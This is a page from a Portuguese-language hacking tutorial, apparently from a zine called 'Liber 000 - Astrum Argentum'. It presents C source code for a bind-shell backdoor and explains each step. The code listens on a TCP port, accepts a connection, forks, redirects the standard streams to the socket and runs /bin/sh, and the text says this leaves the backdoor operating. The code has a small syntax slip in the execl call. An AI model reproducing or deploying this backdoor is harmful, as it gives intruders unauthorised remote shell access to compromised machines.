Liber 000 - Astrum Argentum

struct sockaddr_in server_address;
struct sockaddr_in client_address;
Declaração dos sockets do cliente e do servidor além de variáveis
auxiliares que iremos utilizar mais a frente. A clientpid e a serverpid,
serão utilizadas para a abertura de processos mais tarde.
sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
bzero((char *) &server_address, sizeof(server_address));
server_address.sin_family=AF_INET;
server_address.sin_port=htons(PORTA);
server_address.sin_addr.s_addr=htonl(INADDR_ANY);
bind(sockfd, (struct sockaddr *)&server_address, sizeof
(server_address));
listen(sockfd, 5);
signal(SIGHUP, SIG_IGN);
Declaração dos sockets aqui vemos as linhas chaves de nosso programa.
Declaramos socket sockfd, em seguida obtemos o IP da máquina que
hospeda o backdoor (server_address.sin_family=AF_INET;).
Em seguida declaramos a porta do qual o backddor estará ouvindo as
conexões.( server_address.sin_port=htons(PORTA);) e por último
utilizamos a função bind da qual associamos a porta TCP ao socket. E por
último colocamos o socket em escuta, aguardando as conexões (listen
(sockfd, 5);), tratando alguns sinais importantes no sistema (signal
(SIGHUP, SIG_IGN);). Este é o cérebro de nosso programa.
socklen=sizeof(client_address);
temp=accept(sockfd, (struct sockaddr *)&client_address,&socklen);
Nesta fase tratamos a conexão do cliente colocando na variável temp o
accept para a conexão feita pelo cliente.
write(temp, MSGINI, sizeof(MSGINI));
if (temp < 0) exit(0);
clientpid=getpid();
serverpid=fork();
if (serverpid != 0)
{
dup2(temp,0); dup2(temp,1); dup2(temp,2);
execl("/bin/sh","/bin/sh",(char *)0;
}
close(temp);
}
Por último tartamos os PIDS e preparamos o ambiente para executar o
shell (execl("/bin/sh","/bin/sh",(char *)0);/*) e pronto o backdoor estrá
operando.
44